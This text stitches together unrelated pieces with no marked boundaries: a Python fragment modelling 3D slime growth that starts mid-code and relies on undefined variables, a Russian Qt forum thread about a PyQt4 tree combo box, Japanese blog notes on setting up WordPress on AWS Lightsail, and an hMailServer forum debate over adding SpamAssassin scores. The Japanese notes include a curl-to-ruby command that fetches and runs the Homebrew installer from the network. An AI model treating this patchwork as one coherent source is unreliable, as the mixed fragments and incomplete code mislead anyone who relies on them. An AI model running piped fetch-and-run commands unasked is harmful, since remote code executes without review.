option = (loc1[0]+d[0], loc1[1]+d[1], loc1[2]+d[2])
if option in emptyGrid: loc2Options.append(option)
loc2 = random.choice(loc2Options)
dir1, dir2 = (loc1[0]-loc2[0], loc1[1]-loc2[1], loc1[2]-loc2[2]),
(loc2[0]-loc1[0], loc2[1]-loc1[1], loc2[2]-loc1[2])
plane1, plane2 = random.choice(ActiveCell.getPlanes(dir1)),
random.choice(ActiveCell.getPlanes(dir2))
cell1 = ActiveCell(loc1, dir1, plane1)
cell2 = ActiveCell(loc2, dir2, plane2)
self.frontiers += [cell1, cell2]
self.update(emptyGrid)
def update(self, emptyGrid):
"""
update slime occupied locations and emptygrid cells
"""
self.locs |= {self.frontiers[0].loc, self.frontiers[1].loc}
emptyGrid -= self.locs
if not self.frontiers[0].active and not self.frontiers[1].active:
self.active = False
def grow(self, emptyGrid):
"""
grow slime if cells in frontiers are active
"""
for cell in self.frontiers:
if cell.active == True:
cell.turn(self.locs, emptyGrid, boundaryGrid)
nextCell = cell.getNextCell()
if nextCell not in emptyGrid:
cell.active = False
else:
cell.loc = nextCell
cell.curLen += 1
self.update(emptyGrid)
class ActiveCell(object):
def __init__(self, location, direction, plane):
self.loc = location
self.dir = direction
self.curTurn = 'left'
self.curPlane = plane
self.curLen = 3 # length of current line
self.active = True
@staticmethod
def getPlanes(dir):
"""
return all possible planes from a given direction
planes should not be perpendicular to direction
"""
allPlanes = ('yzPlane', 'xzPlane', 'xyPlane')
planes = []
for i in range(len(dir)):
if dir[i] == 0:
planes.append(allPlanes[i])
return planes
def getNextCell(self):
"""
return the next potential cell to grow to
"""
nextCell = (self.loc[0]+self.dir[0], self.loc[1]+self.dir[1],
self.loc[2]+self.dir[2])
return nextCell
def changeDir(self, turn, plane):
"""
update direction as specified by turn
in 3D the turns are left, and the plane
on which the slime is currently growing
"""
if plane == 'xyPlane':
if turn == 'left':
self.dir = (-self.dir[1], self.dir[0], self.dir[2])
elif turn == 'right':
self.dir = (self.dir[1], -self.dir[0], self.dir[2])
if plane == 'xzPlane':
if turn == 'left':
self.dir = (-self.dir[2], self.dir[1], self.dir[0])
elif turn == 'right':
self.dir = (self.dir[2], self.dir[1], -self.dir[0])
if plane == 'yzPlane':
if turn == 'left':
self.dir = (self.dir[0], -self.dir[2], self.dir[1])
elif turn == 'right':
self.dir = (self.dir[0], self.dir[2], -self.dir[1])
def turn(self, slimeLocs, emptyGrid, boundaryGrid):
"""
turn based on the next cell encountered
"""
nextCell = self.getNextCell()
if nextCell in emptyGrid and self.curLen >= 4:
self.changeDir(self.curTurn, self.curPlane)
self.curPlane = random.choice(ActiveCell.getPlanes(self.dir))
if self.curTurn == 'left':
self.curTurn = 'right'
self.curLen = 1
elif self.curTurn == 'right':
self.curTurn = 'left'
self.curLen = 1
if nextCell not in boundaryGrid:
self.changeDir(self.curTurn, self.curPlane)
self.curPlane = random.choice(ActiveCell.getPlanes(self.dir))
self.curLen = 1
elif nextCell in slimeLocs:
self.changeDir('left', self.curPlane)
self.curPlane = random.choice(ActiveCell.getPlanes(self.dir))
self.curTurn == 'left'
self.curLen = 1
elif nextCell not in emptyGrid:
self.changeDir('right', self.curPlane)
self.curPlane = random.choice(ActiveCell.getPlanes(self.dir))
self.curTurn == 'right'
self.curLen = 1
if reset:
# generate grid
boundaryGrid = set((row, col, hei) for row in range(rows)
for col in range(cols)
for hei in range(heis))
emptyGrid = set((row, col, hei) for row in range(rows)
for col in range(cols)
for hei in range(heis))
random.seed(0)
slimeList = []
colorsList = []
rowsList = []
colsList = []
heisList = []
for i in range(n):
newSlime = Slime()
newSlime.initCells(emptyGrid)
slimeList.append(newSlime)
else:
rowsList = []
colsList = []
heisList = []
colorsList = []
for slime in slimeList:
slime.grow(emptyGrid)
rowsList.append([e[0] for e in slime.locs])
colsList.append([e[1] for e in slime.locs])
heisList.append([e[2] for e in slime.locs])
colorsList.append(str(slime.color))
x = th.list_to_tree(rowsList)
y = th.list_to_tree(colsList)
z = th.list_to_tree(heisList)
color = th.list_to_tree(colorsList)
|
Получение порядкового номера QTreeView, с родителем и без
2 В
В В В
Получение порядкового номера QTreeView, с родителем и без
poluna
16.12.2015, 12:36
Сообщение #11
Студент
Группа: Участник
Сообщений: 27
Регистрация: 5.10.2015
Пользователь №: 4458
Спасибо сказали: 1 раз(а)
Репутация:
0В В
Теперь я поняла тебя.
Вариант неплох, и вроде как даже проще в реализации.
Всё, вопрос пока снимаю. Знаю как реализовывать!
lanz
16.12.2015, 12:44
Сообщение #12
Старейший участник
Группа: Участник
Сообщений: 690
Регистрация: 28.12.2012
Пользователь №: 3660
Спасибо сказали: 113 раз(а)
Репутация:
8В В
Цитата
"внемодельное" дерево
Ойойой, не слушайте его, он вас плохому научит!
По идее модель в комбобоксе и модель в дереве слева - это должна быть одна и та же модель.
Поэтому индекс от одного должен подходить к индексу от другого.
Т.е. вы сначала получаете выделенный индекс от дерева
(назовем его idx)
потом в комбобоксе делаете
combo->setRootModelIndex(idx.parent())
combo->setCurrentIndex(idx.row())
http://doc.qt.io/qt-4.8/qcombobox.html#setRootModelIndex
http://doc.qt.io/qt-4.8/qcombobox.html#currentIndex-prop
Алексей1153
16.12.2015, 13:00
Сообщение #13
фрилансер
Группа: Участник
Сообщений: 2906
Регистрация: 19.6.2010
�з: Обливион
Пользователь №: 1822
Спасибо сказали: 215 раз(а)
Репутация:
34  lanz, да можно и в модели хранить, но я так не люблю делать, это же неудобно ))lanz, оно, вообще говоря, так и происходит - противоречий нету, но некоторые операции по своему контейнеру удобнее производить
А в данном случае твой вариант лучше будет, конечно )
Сообщение отредактировал
Алексей1153 - 16.12.2015, 13:08
ViGOur
16.12.2015, 13:27
Сообщение #14
Мастер
Группа: Модератор
Сообщений: 3293
Регистрация: 9.10.2007
�з: Москва
Пользователь №: 4
Спасибо сказали: 231 раз(а)
Репутация:
40В В
А по моему
Алексей1153 предложил хороший способ, я сам подобным же пользуюсь.
Есть список (QList) или дерево(QMap), которое откуда-то загружается и которое отображается в модели. Очень удобно добавлять, редактировать, удалять. А модель это же абстракция и она не должна по идее хранить данные, как и вид.
lanz, выше сказано
Есть у меня класс TreeComboBox, как можно понять из названия в QComboBox у меня находится QTreeView.
и как я понимаю твой метод идеально подходит для QComboBox, но не для переопределенного класса. Дождемся автора, что она скажет!
poluna
16.12.2015, 13:34
Сообщение #15
Студент
Группа: Участник
Сообщений: 27
Регистрация: 5.10.2015
Пользователь №: 4458
Спасибо сказали: 1 раз(а)
Репутация:
0  lanz, если в комбобоксе стандартными средствами можно показать дерево, то твой метод подойдет, но я не смогла.
Как я поняла для показа дерева в комбобокс нужно переопределять класс, я сделала так:
#! /usr/bin/python
# -*- coding: UTF-8 -*-
from PyQt4 import QtCore, QtGui
class TreeComboBox(QtGui.QComboBox):
def __init__(self, parent=None):
super(QtGui.QComboBox, self).__init__(parent)
self._skipNextHide = False
self._treeView = QtGui.QTreeView(self)
self.setView(self._treeView)
self._treeView.header().hide()
self._treeView.viewport().installEventFilter(self)
def eventFilter( self, object, event):
if event.type() == QtCore.QEvent.MouseButtonPress and object == self.view().viewport():
index = self.view().indexAt(event.pos())
if not self.view().visualRect(index).contains(event.pos()):
self._skipNextHide = True
return False
def showPopup(self):
self.setRootModelIndex(QtCore.QModelIndex())
self._treeView.expandAll()
QtGui.QComboBox.showPopup(self)
def hidePopup(self):
self.setRootModelIndex(self.view().currentIndex().parent())
self.setCurrentIndex(self.view().currentIndex().row())
if self._skipNextHide:
self._skipNextHide = False
else:
QtGui.QComboBox.hidePopup(self)
если я не права, то буду только рада, сразу куча проблем исчезнет!
Но пока не знаю как!
lanz
16.12.2015, 14:53
Сообщение #16
Старейший участник
Группа: Участник
Сообщений: 690
Регистрация: 28.12.2012
Пользователь №: 3660
Спасибо сказали: 113 раз(а)
Репутация:
8  poluna, ну у меня ваш код вроде работает как надо, ЧЯДНТ?
Немножко поменял hidePopup, чтобы он сразу все не корячил:
def hidePopup(self):
if self._skipNextHide:
self._skipNextHide = False
else:
self.setRootModelIndex(self.view().currentIndex().parent())
self.setCurrentIndex(self.view().currentIndex().row())
QtGui.QComboBox.hidePopup(self)
poluna
16.12.2015, 16:06
Сообщение #17
Студент
Группа: Участник
Сообщений: 27
Регистрация: 5.10.2015
Пользователь №: 4458
Спасибо сказали: 1 раз(а)
Репутация:
0В В
Все, поняла, все работает!
Выкладываю работающий пример, так же на python:
пример
#! /usr/bin/python
# -*- coding: UTF-8 -*-
import sys
from PyQt4 import QtCore, QtGui
class TreeComboBox(QtGui.QComboBox):
def __init__(self, parent=None):
super(QtGui.QComboBox, self).__init__(parent)
self._skipNextHide = False
self._treeView = QtGui.QTreeView(self)
self.setView(self._treeView)
self._treeView.header().hide()
self._treeView.viewport().installEventFilter(self)
def eventFilter( self, object, event):
if event.type() == QtCore.QEvent.MouseButtonPress and object == self.view().viewport():
index = self.view().indexAt(event.pos())
if not self.view().visualRect(index).contains(event.pos()):
self._skipNextHide = True
return False
def showPopup(self):
self.setRootModelIndex(QtCore.QModelIndex())
self._treeView.expandAll()
QtGui.QComboBox.showPopup(self)
def hidePopup(self):
if self._skipNextHide:
self._skipNextHide = False
else:
self.setRootModelIndex(self.view().currentIndex().parent())
self.setCurrentIndex(self.view().currentIndex().row())
QtGui.QComboBox.hidePopup(self)
class Main(QtGui.QWidget):
def __init__(self, parent=None):
QtGui.QWidget.__init__(self, parent)
self._comboBox = TreeComboBox(self)
self._treeView = QtGui.QTreeView(self)
layout = QtGui.QVBoxLayout()
layout.addWidget(self._comboBox)
layout.addWidget(self._treeView)
self.setLayout(layout)
model = QtGui.QStandardItemModel()
for a in range(3):
i = QtGui.QStandardItem('Item ' + str(a))
for b in range(3):
ii = QtGui.QStandardItem('sub 1 Item ' + str(b))
i.setChild(b, ii)
for c in range(3):
iii = QtGui.QStandardItem('sub 2 Item ' + str(c))
ii.setChild(c, iii)
model.appendRow(i)
self._comboBox.setModel(model)
self._treeView.setModel(model)
self.connect(self._treeView, QtCore.SIGNAL("clicked(const QModelIndex&)"), self.comboSelect)
def comboSelect(self, idx):
self._comboBox.setRootModelIndex(idx.parent())
self._comboBox.setCurrentIndex(idx.row())
if __name__ == "__main__":
app = QtGui.QApplication(sys.argv)
main = Main()
main.show()
sys.exit(app.exec_())
lanz, спасибо огромное!
2
В В В
Текстовая версия Сейчас: 22.1.2021, 11:50
|
このブログで使用するドメインを取得します。
現状、ブログ構築ブログみたいになっていますが、
早々にデータ分析に関する話をメインにしたいのでそれっぽいドメインを取ります。
色々な管理をAWSに集約したいので、お名前.com等ではなく、
Amazon Route 53で取得します。
公式ドキュメントはこちら。
新しいドメインの登録
手順
AWS マネジメントコンソール にサインイン
Route 53 コンソールを開く
[Domain Registration] の [Get Started Now] を選択
[Register Domain] をクリック
Choose a domain name で登録したいドメインを入力
checkをおして、登録できること(StatusがAvailable)を確認
[Add to Cart]をクリック
登録する年数を選択
[Continue] をクリック
Registrant Contactに自分の情報を登録
[Continue]をクリック
I have read and agree to the AWS Domain Name Registration Agreement にチェック
[Complete Purchase]をクリック
ドメイン登録が完了するまでに最大3日かかるそうです。
(Domain registration might take up to three days to complete.)
ドメインの一覧画面に行くと、Statusが
Domain registration in progress になっていました。
数分後に入力したメールアドレスの確認メールが届きましたので、
中のリンクをクリックして待ちます。
タイトルにはMacbook と書きましたが、デスクトップでも手順は同じはず。
ちなみに、普段の分析ではMac book Proを使用しています。
手順は簡単で、公式サイトにあるコマンドをターミナルで実行するだけ。
ここにもコマンドを転記しておきますが、公式サイトからコピーしたほうが確実です。
/usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"
Macではmecabもpyenvもhomebrewで導入すると簡単です。
ブログの右下がペロッとめくれた見た目になり、bitnamiのバナーが見えているのでこれを消します。
公式マニュアルの方法はこちら。
Remove The Bitnami Banner
サーバーにSSHでログインして、以下のコマンドを実行して設定変更とサーバー再起動を行います。
公式キュメントで、 APPNAME と書かれてる部分は wordpressですね。
sudo /opt/bitnami/apps/wordpress/bnconfig --disable_banner 1
sudo /opt/bitnami/ctlscript.sh restart apache
今後プログラムを含む記事が増える予定なのでsyntax highlighter を導入しました。
色々方法があるようですが、とりあえず検索した中で比較的評判の良かったprismjsを採用します。
公式サイト
Prismjsの導入
WordPress用に Prism For WP というプラグインがあるようなのでこれをインストールして有効化。
設定画面で、利用予定の言語(Pythonなど)にチェックを入れました。
MarkupというのがHTMLらしいです。
行番号表示機能も使いそうなので、Select Pluginsの Line Numbers にもチェック。
また、Normalize Whitespace を有効化しておくと先頭行の不要な空白を消してくれるそうです。
Prismjsの使い方
ソースコードをpreタグとcodeタグで囲み、preタグのclassにline-numbers、codeタグのクラスにlanguage-x(xは言語名)を設定します。
HTMLで使用した例
<pre class="line-numbers"><code class="language-markup">
ここにHTMLのソースコードを書く
</code></pre>
Pythonで使う場合は language-python。使ってみた例。
記事に書いたコード
<pre class="line-numbers"><code class="language-python">
a, b = 0, 1
for _ in range(10):
a, b = b, a + b
print(b)
</code></pre>
表示結果
a, b = 0, 1
print(b)
for _ in range(10):
a, b = b, a + b
print(b)
ちなみにサンプルのプログラムはフィボナッチ数列を出力します。
要するにこのブログのサーバーを立てたときのメモです。
ある程度記事が貯まるまでは集客もSEOも考えてないので数日はドメイン無しで運用中。
公式ドキュメント
元々の手順が簡単なうえ、上記の各ドキュメントがわかりやすいのでほぼ迷わず作業完了しました。
サーバー作成手順
AWSコンソールにログイン
全てのサービスのコンピューティングにある Lightsail を選択
インスタンスタブの[インスタンスの作成]ボタンをクリック
インスタンスロケーションを確認(東京)
インスタンスイメージの選択画面で、下記の通り選択
Linux/Unix
アプリ+OS
wordpress
インスタンスプランの選択 (今回は一番安いのを選択)
インスタンスに名前を付ける
[インスタンスの作成]ボタンをクリック
静的IP作成手順
Lightsailの管理画面で、ネットワークタブを選択
静的IPの作成ボタンをクリック
静的 IP をアタッチする Lightsail リソースを選択
静的 IP に名前を付け、[作成] をクリック
アクセスとログイン
Lightsailのホーム画面から作成したインスタンスを選ぶと、作成したIPアドレスを確認できます。
ブラウザのURLにIPアドレスを入力すると、 自分のwordpress画面にアクセスできる。
また、Lightsailのホーム画面からサーバーにブラウザ上でSSH接続可能。
Lightsail の右上のアカウントから、SSHキーをダウンロードし、接続することもできる。
SSH接続するとホームディレクトリに
bitnami_application_password
というファイルがあり、この中にログインパスワードがある。
ちなみにユーザー名は user
関係ないですが、以前 RedmineをLightsail で立てたときに
初期生成されているユーザー名がわからず苦戦したことがあります。
はじめまして。ゆうたろうと申します。
この度、新しいBlogを立ち上げました。
ブログのメインの目的は日頃業務や興味のため調べた内容をまとめる場所を作ることです。
日々の業務や趣味で調べたことが各所に散らばっているので、ここに統一したいと考えています。
(自宅のPC2台、個人のサーバー、職場のPCとサーバー、紙のノートなど)
その他、Wordpressを使ってみたかったとか、Googleアナリティクスを個人で試す環境が欲しかったとか、細かな理由があります。
しばらくは過去にどこかに書いたメモのコピーとか、このブログ開設時にやった作業とかがメインのコンテンツになると思いますが、
徐々にきちんと有益なコンテンツを載せれるようにしたいと思っていますのでよろしくお願いします。
略歴
地方の国立大学/大学院修士課程で、数学を専攻し修了したのち、下記の3社で3職種経験。
1社目 電機メーカー本体の金融機関向けフロントSE
2社目 医療機関向けのWeb制作会社のエンジニア。(中国の開発子会社のマネジメントを担当)
3社目(現職) とあるWebサービス会社のデータサイエンティスト
|
Is it intended behavior that hMailServer will not add the SpamAssassin score to its own score unless the SpamAssassin score is greater than or equal to the SpamAssassin spam threshold (i.e., SpamAssassin tags it as spam)? I've seen some discussions on this and it is eventually just dropped and the people usually just lower their SpamAssassin threshold score to make hMailServer always add the scores together (thus making SpamAssassin tag virtually everything as spam). It seems more logical to always add the scores together (or at least give us the option). Is this by design or is it a bug? Are there people who actually want it to work that way it currently is?
Thanks,
Chad
Thanks,
Chad
If SpamAssassin tags mail as spam, does that change the message?
(I don't use SpamAssassin)
I'm also guessing that the spam score may NOT be relayed to hMailserver by SpamAssassin unless the message is marked as SPAM
(I don't use SpamAssassin)
I'm also guessing that the spam score may NOT be relayed to hMailserver by SpamAssassin unless the message is marked as SPAM
Just 'cause I link to a page and say little else doesn't mean I am not being nice.
https://www.hmailserver.com/documentation
https://www.hmailserver.com/documentation
When SpamAssassin scores it above the configured threshold, it will add an X-Spam-Status: YES header (along with other informative headers). I downloaded the hMailServer source code and verified that it does not store the SpamAssassin score (and thus pass it back up to main spam handling routine) unless it finds the X-Spam-Status: YES header. Unless most people really like this behavior, I propose that it always count the score regardless of the X-Spam-Status value. In fact, I feel like that is the whole point of scoring....you keep testing and keep adding up scores until your ultimate threshold is reached. In my particular case, SpamAssassin gives a score of 4.9 (where 5.0 is the SpamAssassin threshold) and then hMailServer failed the SPF test which I score as 5. The total score should have been 9.9, but hMailServer just scored it as 5. My delete threshold is 9, so the mail should have been deleted but it wasn't.
So if you had set your SpamAssassin score at 1, the actual score value would have been passed, and the message rejected.
From what you are saying, the down side to setting the SpamAssassin mark score to 1 is that some mail that doesn't reach the hmailsevrer spam score will contain a spamAssassin header showing a SPamAssassin score?
Is that such a big deal?
From what you are saying, the down side to setting the SpamAssassin mark score to 1 is that some mail that doesn't reach the hmailsevrer spam score will contain a spamAssassin header showing a SPamAssassin score?
Is that such a big deal?
Just 'cause I link to a page and say little else doesn't mean I am not being nice.
https://www.hmailserver.com/documentation
https://www.hmailserver.com/documentation
In my opinion I cant see why you would want to add SA score unless SA has deemed it potential spam.
By using SA you are trusting it and iuts rules to make a judgement: as per your SA configuration, a mail is either deemed as Spam or it is deemed as safe.
You kow that SA rules add scores in decimal and as negatives such as
0.7
-0.2
0.5
1.3
-1.3
and as such it collectively determines its spam value. Furthermore it does this because the rules and its abilities are FAR MORE advanced than any HMS does internally.
By using the SA score if only appropriate when you think SA may have determined as spam (I have the threshold set at 3 which seems to be just right) and yet you want to not FULLY trust it and add HMS tests on to it too. ie, maybe SA scores 3.1 (determining as SPAM), and you have your own HMS threshold set to something higher (5 or 6) allowing for your own HMS tests. Of course this your own HMS test scoring is probably not as fine tuned as the SA scoring rules so is more brute force.
The alternative you are proposing is to say that even though SA thinks a mail is not spam (because its only scored 1.0), you are going to use this '1' and add it to you own HMS test; well what happens if the SA 'HELO' yest is the score of 1, and then you run HMS 'HELO' test scoring 4 (same test yet scored twice?) You now deem your mail as spam (acheiving 5) when in reality both SA and HMS hasnt REALLY found it as spam at all. Whereas using the existing method the mail, even though itis being tested twice for the same condition, still isnt deemed as spam (SA scores it 1.0, hms scores it 4 - and yet your HMS score threshold is 5).
My point is that it is right in my mind to perform the way it does (only when SA considers it as spam) when you have already decided to trust SA's decision making and judgement.
By using SA you are trusting it and iuts rules to make a judgement: as per your SA configuration, a mail is either deemed as Spam or it is deemed as safe.
You kow that SA rules add scores in decimal and as negatives such as
0.7
-0.2
0.5
1.3
-1.3
and as such it collectively determines its spam value. Furthermore it does this because the rules and its abilities are FAR MORE advanced than any HMS does internally.
By using the SA score if only appropriate when you think SA may have determined as spam (I have the threshold set at 3 which seems to be just right) and yet you want to not FULLY trust it and add HMS tests on to it too. ie, maybe SA scores 3.1 (determining as SPAM), and you have your own HMS threshold set to something higher (5 or 6) allowing for your own HMS tests. Of course this your own HMS test scoring is probably not as fine tuned as the SA scoring rules so is more brute force.
The alternative you are proposing is to say that even though SA thinks a mail is not spam (because its only scored 1.0), you are going to use this '1' and add it to you own HMS test; well what happens if the SA 'HELO' yest is the score of 1, and then you run HMS 'HELO' test scoring 4 (same test yet scored twice?) You now deem your mail as spam (acheiving 5) when in reality both SA and HMS hasnt REALLY found it as spam at all. Whereas using the existing method the mail, even though itis being tested twice for the same condition, still isnt deemed as spam (SA scores it 1.0, hms scores it 4 - and yet your HMS score threshold is 5).
My point is that it is right in my mind to perform the way it does (only when SA considers it as spam) when you have already decided to trust SA's decision making and judgement.
5.7 on test.
AV:
SpamassassinForWindows 3.4.0spamd service
AV:
Clamwin+Clamdservice +sanesecurity defs: https://www.hmailserver.com/forum/viewtopic.php?f=21&t=26829
Agreed.jimimaseye wrote:Furthermore it does this because the rules and its abilities are FAR MORE advanced than any HMS does internally.
Thinking about this, I'd expect that the SpamAssassin score was added irrespective of whether SpamAssassin marked the message as SPAM or not. (How else could the negative values be useful) That's certainly how the GUI looks.
I'd think that NOT doing that is a bug, and tha this should be added to the issue tracker at https://github.com/hmailserver/hmailserver/issues
Just 'cause I link to a page and say little else doesn't mean I am not being nice.
https://www.hmailserver.com/documentation
https://www.hmailserver.com/documentation
To give you an idea Matt, a typical Spamassassin header is added regardless and looks like thiswhere everything from "tests=" are the names of all rules applied and scored due to matching. The spam 'report' then lists them test individually with their scores.
Now, this is a good example: given this particular report scored overall 0.3, how would you have HMS take that score (as it only deals with integer scores)?
And here is another example:
The result of this is is MINUS 4.4 (-4.4). Now if you were to apply your own HMS rules in DNSBL or SURBL (that SA doesnt cover) and even score a match at 5 and 4 (total 9) it would still not hit a HMS threshold of 5 (which you may have set) - despite HMS actually scoring way and above this.
This explains why I belive you should only use SA scores when SA has determined it as spam by hitting ITS threshold.
Code: Select all
X-Spam-Status: No, score=0.3 required=3.0 tests=BAYES_00,
DYN_RDNS_AND_INLINE_IMAGE,HTML_MESSAGE,RDNS_DYNAMIC,SPF_PASS,
T_KAM_HTML_FONT_INVALID autolearn=no autolearn_force=no version=3.4.0
X-Spam-Report:
* -0.0 SPF_PASS SPF: sender matches SPF record
* 0.0 T_KAM_HTML_FONT_INVALID BODY: Test for Invalidly Named or Formatted
* Colors in HTML
* -1.9 BAYES_00 BODY: Bayes spam probability is 0 to 1%
* [score: 0.0000]
* 0.0 HTML_MESSAGE BODY: HTML included in message
* 1.0 RDNS_DYNAMIC Delivered to internal network by host with
* dynamic-looking rDNS
* 1.2 DYN_RDNS_AND_INLINE_IMAGE Contains image, and was sent by dynamic
* rDNS
*
Now, this is a good example: given this particular report scored overall 0.3, how would you have HMS take that score (as it only deals with integer scores)?
And here is another example:
Code: Select all
X-Spam-Status: No, score=-4.4 required=3.0 tests=BAYES_00,DKIM_SIGNED,
DKIM_VALID,DKIM_VALID_AU,FREEMAIL_FROM,HTML_MESSAGE,KHOP_RCVD_TRUST,
RCVD_IN_DNSWL_LOW,RCVD_IN_HOSTKARMA_YE,RCVD_IN_MSPIKE_H3,RCVD_IN_MSPIKE_WL,
SPF_PASS,T_KAM_HTML_FONT_INVALID autolearn=ham autolearn_force=no
version=3.4.0
X-Spam-Report:
* 0.0 RCVD_IN_HOSTKARMA_YE RBL: HostKarma: relay in yellow list (varies)
* [209.85.212.177 listed in hostkarma.junkemailfilter.com]
* 0.0 FREEMAIL_FROM Sender email is commonly abused enduser mail provider
* (sandimy[at]gmail.com)
* -0.7 RCVD_IN_DNSWL_LOW RBL: Sender listed at http://www.dnswl.org/, low
* trust
* [209.85.212.177 listed in list.dnswl.org]
* -0.0 RCVD_IN_MSPIKE_H3 RBL: Good reputation (+3)
* [209.85.212.177 listed in wl.mailspike.net]
* -0.0 SPF_PASS SPF: sender matches SPF record
* 0.0 T_KAM_HTML_FONT_INVALID BODY: Test for Invalidly Named or Formatted
* Colors in HTML
* -1.9 BAYES_00 BODY: Bayes spam probability is 0 to 1%
* [score: 0.0000]
* 0.0 HTML_MESSAGE BODY: HTML included in message
* -0.1 DKIM_VALID_AU Message has a valid DKIM or DK signature from author's
* domain
* -0.1 DKIM_VALID Message has at least one valid DKIM or DK signature
* 0.1 DKIM_SIGNED Message has a DKIM or DK signature, not necessarily
* valid
* -0.0 RCVD_IN_MSPIKE_WL Mailspike good senders
* -1.8 KHOP_RCVD_TRUST DNS-Whitelisted sender is verified
*
This explains why I belive you should only use SA scores when SA has determined it as spam by hitting ITS threshold.
5.7 on test.
AV:
SpamassassinForWindows 3.4.0spamd service
AV:
Clamwin+Clamdservice +sanesecurity defs: https://www.hmailserver.com/forum/viewtopic.php?f=21&t=26829
Mine does... Hint: "URIBL"jimimaseye wrote:... or SURBL (that SA doesnt cover) ...
Code: Select all
X-Spam-Status: Yes, score=44.5 required=3.0 tests=BAYES_99,BAYES_999,
BODY_URI_ONLY,KAM_RBL,KAM_VERY_BLACK_DBL,MSGID_FROM_MTA_HEADER,
RAZOR2_CF_RANGE_51_100,RAZOR2_CF_RANGE_E8_51_100,RAZOR2_CHECK,
RCVD_IN_BL_SPAMCOP_NET,RCVD_IN_BRBL_LASTEXT,RCVD_IN_MSPIKE_BL,
RCVD_IN_MSPIKE_L5,RCVD_IN_PBL,RCVD_IN_PSBL,RCVD_IN_RP_RNBL,RCVD_IN_SORBS_WEB,
RCVD_IN_XBL,RCVD_NUMERIC_HELO,TVD_RCVD_IP,TVD_RCVD_IP4,T_FSL_HELO_BARE_IP_2,
URIBL_AB_SURBL,URIBL_BLACK,URIBL_DBL_SPAM,URIBL_JP_SURBL,URIBL_SBL,
URIBL_SBL_A,URIBL_SC_SURBL,URIBL_WS_SURBL autolearn=disabled version=3.4.0
X-Spam-Report:
* 0.6 URIBL_SC_SURBL Contains an URL listed in the SC SURBL blocklist
* [URIs: hotdrugsstore.in]
* 1.3 URIBL_JP_SURBL Contains an URL listed in the JP SURBL blocklist
* [URIs: hotdrugsstore.in]
* 4.5 URIBL_AB_SURBL Contains an URL listed in the AB SURBL blocklist
* [URIs: hotdrugsstore.in]
* 1.6 URIBL_WS_SURBL Contains an URL listed in the WS SURBL blocklist
* [URIs: hotdrugsstore.in]
* 3.3 RCVD_IN_PBL RBL: Received via a relay in Spamhaus PBL
* [109.135.11.38 listed in zen.spamhaus.org]
* 0.4 RCVD_IN_XBL RBL: Received via a relay in Spamhaus XBL
* 3.5 BAYES_99 BODY: Bayes spam probability is 99 to 100%
* [score: 1.0000]
* 0.0 TVD_RCVD_IP Message was received from an IP address
* 0.0 TVD_RCVD_IP4 Message was received from an IPv4 address
* 1.2 RCVD_NUMERIC_HELO Received: contains an IP address used for HELO
* 0.2 BAYES_999 BODY: Bayes spam probability is 99.9 to 100%
* [score: 1.0000]
* 1.9 RAZOR2_CF_RANGE_E8_51_100 Razor2 gives engine 8 confidence level
* above 50%
* [cf: 100] * 0.9 RAZOR2_CHECK Listed in Razor2 (http://razor.sf.net/)
* 0.5 RAZOR2_CF_RANGE_51_100 Razor2 gives confidence level above 50%
* [cf: 100]
* 2.5 URIBL_DBL_SPAM Contains a spam URL listed in the DBL blocklist
* [URIs: hotdrugsstore.in]
* 1.7 URIBL_BLACK Contains an URL listed in the URIBL blacklist
* [URIs: hotdrugsstore.in]
* 3.2 RCVD_IN_MSPIKE_L5 RBL: Very bad reputation (-5)
* [109.135.11.38 listed in bl.mailspike.net]
* 1.4 RCVD_IN_BRBL_LASTEXT RBL: No description available.
* [109.135.11.38 listed in bb.barracudacentral.org]
* 2.7 RCVD_IN_PSBL RBL: Received via a relay in PSBL
* [109.135.11.38 listed in psbl.surriel.com]
* 0.8 RCVD_IN_SORBS_WEB RBL: SORBS: sender is an abusable web server
* [109.135.11.38 listed in dnsbl.sorbs.net]
* 1.3 RCVD_IN_RP_RNBL RBL: Relay in RNBL,
* https://senderscore.org/blacklistlookup/
* [109.135.11.38 listed in bl.score.senderscore.com]
* 1.3 RCVD_IN_BL_SPAMCOP_NET RBL: Received via a relay in bl.spamcop.net
* [Blocked - see <http://www.spamcop.net/bl.shtml?109.135.11.38>]
* 0.1 URIBL_SBL_A Contains URL's A record listed in the SBL blocklist
* [URIs: meekly.hotdrugsstore.in]
* 1.6 URIBL_SBL Contains an URL's NS IP listed in the SBL blocklist
* [URIs: meekly.hotdrugsstore.in]
* 2.0 KAM_RBL Higher scores for hitting multiple trusted RBLs
* 0.0 RCVD_IN_MSPIKE_BL Mailspike blacklisted
* 5.0 KAM_VERY_BLACK_DBL Email that hits both URIBL Black and Spamhaus DBL
* 0.0 MSGID_FROM_MTA_HEADER Message-Id was added by a relay
* 0.0 T_FSL_HELO_BARE_IP_2 No description available.
* 1.0 BODY_URI_ONLY Message body is only a URI in one line of text or for
* an image
SørenR.
Word used by programmers when they do not want to explain what they did.
Algorithm(noun.)
Word used by programmers when they do not want to explain what they did.
I meant you could be adding your OWN lookups into HMS (and setting your own scores against positive matches for them) that Spamassassin has not been coded/rule defined to cover. (I know SA covers most of the main/popular ones such as multi.surbl.org etc., but there might be one the user has found that is not covered by SA rules that he chooses to add).SorenR wrote:Mine does... Hint: "URIBL"
5.7 on test.
AV:
SpamassassinForWindows 3.4.0spamd service
AV:
Clamwin+Clamdservice +sanesecurity defs: https://www.hmailserver.com/forum/viewtopic.php?f=21&t=26829
Ah.. My badjimimaseye wrote:I meant you could be adding your OWN lookups into HMS (and setting your own scores against positive matches for them) that Spamassassin has not been coded/rule defined to cover. (I know SA covers most of the main/popular ones such as multi.surbl.org etc., but there might be one the user has found that is not covered by SA rules that he chooses to add).SorenR wrote:Mine does... Hint: "URIBL"
SørenR.
Word used by programmers when they do not want to explain what they did.
Algorithm(noun.)
Word used by programmers when they do not want to explain what they did.
SpamAssassin can be configured to use other URIBL and DNSBL that aren't provide out of the box. I do, in fact, do this. In my configuration, I was assuming that spam scores were all additive and so I disable the DNS and SURBL options in hMailServer so that they would not contribute to double scoring. I have also spent time slowly studying the types of spam we receive and carefully tuning SpamAssassin to my exact needs. I'm somewhat new to hMailServer...coming from using other commercial products (SecurityGateway, SpamTitan, ORF, etc). All of the other commercial products having a continuous running spam score and I have found this to be very logical and effective. I let hMailServer continue to do SPF, HELO command, and sender DNS-MX checks because it is better suited to do so. I feel like those checks combined with the SpamAssassin checks provide very accurate spam checks. In fact, the majority of spams that get through to my system are the ones where SpamAssassin scores below 5 and hMailServer ignores the score (but would have been spam if it didn't because it failed an hMailServer test).
